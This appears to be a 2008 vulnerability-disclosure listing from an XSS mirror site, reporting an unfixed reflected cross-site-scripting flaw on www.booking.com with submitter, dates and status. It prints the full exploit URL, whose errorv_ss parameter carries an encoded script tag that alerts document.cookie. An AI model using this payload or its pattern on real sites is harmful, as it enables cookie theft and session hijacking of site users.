Security researcher kInGoFcHaOs, has submitted on 27/08/2008 a cross-site-scripting (XSS) vulnerability affecting www.booking.com, which at the time of submission ranked 709 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 02/10/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 27/08/2008 |
Date published: 02/10/2008 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: kInGoFcHaOs |
Domain: www.booking.com |
Category: XSS |
Pagerank: 709 |
|---|
URL: http://www.booking.com/country/de.html?aid=309654;label=de-IMDd7ZsQS42oS*50XRNyrQS1037160772;sid=89f
864d210a97a8de22a504aab8b142d;errorc_checkin_date_invalid=checkin_daysfromnow;errorc_checkin_date_in
valid=checkin_year;errorc_checkin_date_invalid=checkin_month;errorc_checkin_date_invalid=checkin_mon
thday;errorc_checkin_date_invalid=checkin_yearday;errorc_checkin_date_invalid=checkin_week;errorc_ch
eckin_date_invalid=checkin_year_month;errorc_checkin_date_invalid=checkin_year_week;errorc_checkin_d
ate_invalid=checkin;errorc_checkin_date_invalid=checkin_year_month_monthday;errorc_checkin_date_inva
lid=checkin_year_yearday;errorc_checkout_date_invalid=interval;errorc_checkout_date_invalid=checkout
_daysfromnow;errorc_checkout_date_invalid=checkout_year;errorc_checkout_date_invalid=checkout_month;
errorc_checkout_date_invalid=checkout_monthday;errorc_checkout_date_invalid=checkout_yearday;errorc_
checkout_date_invalid=checkout_week;errorc_checkout_date_invalid=checkout_year_month;errorc_checkout
_date_invalid=checkout_year_week;errorc_checkout_date_invalid=checkout;errorc_checkout_date_invalid=
checkout_year_month_monthday;errorc_checkout_date_invalid=checkout_year_yearday;errorv_si=ai%2Cco%2C
ci%2Cre;errorv_do_availability_check=1;errorv_class_interval=1;errorv_ss=%27%3C%22%3C%3CsCrIpT%3Eale
rt(document.cookie)%3C%2FsCrIpT%3E |
|
Click here to view the mirror
|
|
|
| 
